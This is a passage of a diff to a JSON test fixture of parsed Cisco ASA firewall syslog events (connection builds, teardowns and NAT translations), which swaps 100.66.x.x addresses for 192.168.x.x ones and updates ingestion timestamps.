- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101",
+ "ingested": "2021-12-09T13:32:20.603987600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -3686,8 +3686,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.178.133",
- "ip": "100.66.178.133"
+ "address": "192.168.178.133",
+ "ip": "192.168.178.133"
 },
 "tags": [
 "preserve_original_event"
@@ -3722,7 +3722,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.178.133",
+ "192.168.178.133",
 "172.31.98.44"
 ]
 },
@@ -3732,8 +3732,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:25.094831671Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:100.66.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126",
+ "ingested": "2021-12-09T13:32:20.603991900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -3765,8 +3765,8 @@
 },
 "destination": {
 "port": 8266,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1453,
@@ -3806,7 +3806,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -3814,8 +3814,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094833437Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:100.66.98.44/8266",
+ "ingested": "2021-12-09T13:32:20.603995400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -3848,8 +3848,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.133.112",
- "ip": "100.66.133.112"
+ "address": "192.168.133.112",
+ "ip": "192.168.133.112"
 },
 "tags": [
 "preserve_original_event"
@@ -3884,7 +3884,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.133.112",
+ "192.168.133.112",
 "172.31.98.44"
 ]
 },
@@ -3893,8 +3893,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094835210Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:100.66.133.112/80 (100.66.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)",
+ "ingested": "2021-12-09T13:32:20.603999900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -3910,7 +3910,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.133.112",
+ "mapped_source_ip": "192.168.133.112",
 "connection_id": "11777",
 "source_interface": "outside",
 "mapped_destination_port": 1453
@@ -3932,8 +3932,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.133.112",
- "ip": "100.66.133.112"
+ "address": "192.168.133.112",
+ "ip": "192.168.133.112"
 },
 "tags": [
 "preserve_original_event"
@@ -3968,7 +3968,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.133.112",
+ "192.168.133.112",
 "172.31.98.44"
 ]
 },
@@ -3979,8 +3979,8 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-07-19T09:06:25.094836936Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:100.66.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs",
+ "ingested": "2021-12-09T13:32:20.604005800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs",
 "code": "302014",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -4017,8 +4017,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.204.197",
- "ip": "100.66.204.197"
+ "address": "192.168.204.197",
+ "ip": "192.168.204.197"
 },
 "tags": [
 "preserve_original_event"
@@ -4053,7 +4053,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.204.197",
+ "192.168.204.197",
 "172.31.98.44"
 ]
 },
@@ -4062,8 +4062,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094838659Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:100.66.204.197/53 (100.66.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:32:20.604011600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -4079,7 +4079,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.204.197",
+ "mapped_source_ip": "192.168.204.197",
 "connection_id": "11779",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -4101,8 +4101,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.157.232",
- "ip": "100.66.157.232"
+ "address": "192.168.157.232",
+ "ip": "192.168.157.232"
 },
 "tags": [
 "preserve_original_event"
@@ -4137,7 +4137,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.157.232",
+ "192.168.157.232",
 "172.31.98.44"
 ]
 },
@@ -4147,8 +4147,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:25.094840380Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104",
+ "ingested": "2021-12-09T13:32:20.604017500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -4185,8 +4185,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.204.197",
- "ip": "100.66.204.197"
+ "address": "192.168.204.197",
+ "ip": "192.168.204.197"
 },
 "tags": [
 "preserve_original_event"
@@ -4221,7 +4221,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.204.197",
+ "192.168.204.197",
 "172.31.98.44"
 ]
 },
@@ -4231,8 +4231,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:25.094842244Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:100.66.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176",
+ "ingested": "2021-12-09T13:32:20.604023500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -4264,8 +4264,8 @@
 },
 "destination": {
 "port": 8267,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1454,
@@ -4305,7 +4305,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -4313,8 +4313,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094843975Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267",
+ "ingested": "2021-12-09T13:32:20.604029300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -4347,8 +4347,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.128.3",
- "ip": "100.66.128.3"
+ "address": "192.168.128.3",
+ "ip": "192.168.128.3"
 },
 "tags": [
 "preserve_original_event"
@@ -4383,7 +4383,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.128.3",
+ "192.168.128.3",
 "172.31.98.44"
 ]
 },
@@ -4392,8 +4392,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094845707Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)",
+ "ingested": "2021-12-09T13:32:20.604035200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -4409,7 +4409,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.128.3",
+ "mapped_source_ip": "192.168.128.3",
 "connection_id": "11780",
 "source_interface": "outside",
 "mapped_destination_port": 1454
@@ -4426,8 +4426,8 @@
 },
 "destination": {
 "port": 8268,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1455,
@@ -4467,7 +4467,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -4475,8 +4475,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094847586Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268",
+ "ingested": "2021-12-09T13:32:20.604041Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -4509,8 +4509,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.128.3",
- "ip": "100.66.128.3"
+ "address": "192.168.128.3",
+ "ip": "192.168.128.3"
 },
 "tags": [
 "preserve_original_event"
@@ -4545,7 +4545,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.128.3",
+ "192.168.128.3",
 "172.31.98.44"
 ]
 },
@@ -4554,8 +4554,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094849353Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)",
+ "ingested": "2021-12-09T13:32:20.604046800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -4571,7 +4571,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.128.3",
+ "mapped_source_ip": "192.168.128.3",
 "connection_id": "11781",
 "source_interface": "outside",
 "mapped_destination_port": 1455
@@ -4588,8 +4588,8 @@
 },
 "destination": {
 "port": 8269,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1456,
@@ -4629,7 +4629,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -4637,8 +4637,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094851178Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269",
+ "ingested": "2021-12-09T13:32:20.604052600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -4671,8 +4671,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.128.3",
- "ip": "100.66.128.3"
+ "address": "192.168.128.3",
+ "ip": "192.168.128.3"
 },
 "tags": [
 "preserve_original_event"
@@ -4707,7 +4707,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.128.3",
+ "192.168.128.3",
 "172.31.98.44"
 ]
 },
@@ -4716,8 +4716,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094852892Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)",
+ "ingested": "2021-12-09T13:32:20.604058300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -4733,7 +4733,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.128.3",
+ "mapped_source_ip": "192.168.128.3",
 "connection_id": "11782",
 "source_interface": "outside",
 "mapped_destination_port": 1456
@@ -4755,8 +4755,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.100.4",
- "ip": "100.66.100.4"
+ "address": "192.168.100.4",
+ "ip": "192.168.100.4"
 },
 "tags": [
 "preserve_original_event"
@@ -4791,7 +4791,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.100.4",
+ "192.168.100.4",
 "172.31.98.44"
 ]
 },
@@ -4800,8 +4800,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094854615Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:32:20.604064100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -4817,7 +4817,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.100.4",
+ "mapped_source_ip": "192.168.100.4",
 "connection_id": "11783",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -4839,8 +4839,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.100.4",
- "ip": "100.66.100.4"
+ "address": "192.168.100.4",
+ "ip": "192.168.100.4"
 },
 "tags": [
 "preserve_original_event"
@@ -4875,7 +4875,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.100.4",
+ "192.168.100.4",
 "172.31.98.44"
 ]
 },
@@ -4885,8 +4885,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:25.094856323Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104",
+ "ingested": "2021-12-09T13:32:20.604070Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -4918,8 +4918,8 @@
 },
 "destination": {
 "port": 8270,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1457,
@@ -4959,7 +4959,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -4967,8 +4967,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094858039Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270",
+ "ingested": "2021-12-09T13:32:20.604093600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -5001,8 +5001,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.198.40",
- "ip": "100.66.198.40"
+ "address": "192.168.198.40",
+ "ip": "192.168.198.40"
 },
 "tags": [
 "preserve_original_event"
@@ -5037,7 +5037,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.198.40",
+ "192.168.198.40",
 "172.31.98.44"
 ]
 },
@@ -5046,8 +5046,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094859779Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)",
+ "ingested": "2021-12-09T13:32:20.604115100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -5063,7 +5063,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.198.40",
+ "mapped_source_ip": "192.168.198.40",
 "connection_id": "11784",
 "source_interface": "outside",
 "mapped_destination_port": 1457
@@ -5080,8 +5080,8 @@
 },
 "destination": {
 "port": 8271,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1458,
@@ -5121,7 +5121,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -5129,8 +5129,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094861511Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271",
+ "ingested": "2021-12-09T13:32:20.604119200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -5163,8 +5163,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.198.40",
- "ip": "100.66.198.40"
+ "address": "192.168.198.40",
+ "ip": "192.168.198.40"
 },
 "tags": [
 "preserve_original_event"
@@ -5199,7 +5199,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.198.40",
+ "192.168.198.40",
 "172.31.98.44"
 ]
 },
@@ -5208,8 +5208,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094863245Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)",
+ "ingested": "2021-12-09T13:32:20.604123500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -5225,7 +5225,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.198.40",
+ "mapped_source_ip": "192.168.198.40",
 "connection_id": "11785",
 "source_interface": "outside",
 "mapped_destination_port": 1458
@@ -5247,8 +5247,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.1.107",
- "ip": "100.66.1.107"
+ "address": "192.168.1.107",
+ "ip": "192.168.1.107"
 },
 "tags": [
 "preserve_original_event"
@@ -5283,7 +5283,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.1.107",
+ "192.168.1.107",
 "172.31.98.44"
 ]
 },
@@ -5292,8 +5292,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094864986Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:100.66.1.107/53 (100.66.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:32:20.604128200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -5309,7 +5309,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.1.107",
+ "mapped_source_ip": "192.168.1.107",
 "connection_id": "11786",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -5331,8 +5331,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.198.40",
- "ip": "100.66.198.40"
+ "address": "192.168.198.40",
+ "ip": "192.168.198.40"
 },
 "tags": [
 "preserve_original_event"
@@ -5367,7 +5367,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.198.40",
+ "192.168.198.40",
 "172.31.98.44"
 ]
 },
@@ -5378,8 +5378,8 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-07-19T09:06:25.094866695Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:100.66.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs",
+ "ingested": "2021-12-09T13:32:20.604132800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs",
 "code": "302014",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -5411,8 +5411,8 @@
 },
 "destination": {
 "port": 8272,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1459,
@@ -5452,7 +5452,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -5460,8 +5460,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094868465Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272",
+ "ingested": "2021-12-09T13:32:20.604136400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -5494,8 +5494,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.198.40",
- "ip": "100.66.198.40"
+ "address": "192.168.198.40",
+ "ip": "192.168.198.40"
 },
 "tags": [
 "preserve_original_event"
@@ -5530,7 +5530,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.198.40",
+ "192.168.198.40",
 "172.31.98.44"
 ]
 },
@@ -5539,8 +5539,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094870253Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)",
+ "ingested": "2021-12-09T13:32:20.604140600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -5556,7 +5556,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.198.40",
+ "mapped_source_ip": "192.168.198.40",
 "connection_id": "11787",
 "source_interface": "outside",
 "mapped_destination_port": 1459
@@ -5578,8 +5578,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.1.107",
- "ip": "100.66.1.107"
+ "address": "192.168.1.107",
+ "ip": "192.168.1.107"
 },
 "tags": [
 "preserve_original_event"
@@ -5614,7 +5614,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.1.107",
+ "192.168.1.107",
 "172.31.98.44"
 ]
 },
@@ -5624,8 +5624,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:25.094871988Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:100.66.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375",
+ "ingested": "2021-12-09T13:32:20.604146Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -5657,8 +5657,8 @@
 },
 "destination": {
 "port": 8273,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1460,
@@ -5698,7 +5698,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -5706,8 +5706,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094873752Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273",
+ "ingested": "2021-12-09T13:32:20.604151100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -5740,8 +5740,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.192.44",
- "ip": "100.66.192.44"
+ "address": "192.168.192.44",
+ "ip": "192.168.192.44"
 },
 "tags": [
 "preserve_original_event"
@@ -5776,7 +5776,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.192.44",
+ "192.168.192.44",
 "172.31.98.44"
 ]
 },
